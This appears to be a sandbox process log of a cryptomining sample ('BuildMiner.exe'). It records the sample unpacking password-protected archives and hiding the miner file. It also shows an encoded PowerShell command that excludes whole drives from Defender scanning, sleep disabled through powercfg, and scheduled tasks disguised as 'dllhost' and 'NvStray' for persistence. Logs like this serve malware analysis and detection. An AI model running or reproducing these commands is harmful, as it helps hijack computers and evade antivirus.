mode.com mode 65,10
21727z.exe 7z.exe e file.zip -p72822978824107435963403340 -oextracted
22287z.exe 7z.exe e extracted/file_3.zip -oextracted
22767z.exe 7z.exe e extracted/file_2.zip -oextracted
23247z.exe 7z.exe e extracted/file_1.zip -oextracted
2372attrib.exe attrib +H "BuildMiner.exe"
2420cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAGQAYwBqAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AHgAQwBZAGUAQwBuAGUAbABCACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEwAQgBTAGgAMgBBADUAMQB1AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABsAEUASgBwAGkAVwBPACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
2644powershell.exe powershell -EncodedCommand "PAAjAGQAYwBqAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AHgAQwBZAGUAQwBuAGUAbABCACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEwAQgBTAGgAMgBBADUAMQB1AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABsAEUASgBwAGkAVwBPACMAPgA="
2700powercfg.exe powercfg /x -hibernate-timeout-ac 0
2824powercfg.exe powercfg /x -hibernate-timeout-dc 0
2872powercfg.exe powercfg /x -standby-timeout-ac 0
2920powercfg.exe powercfg /x -standby-timeout-dc 0
2964powercfg.exe powercfg /hibernate off
3008cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2316schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2612cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7232" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2388schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7232" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2620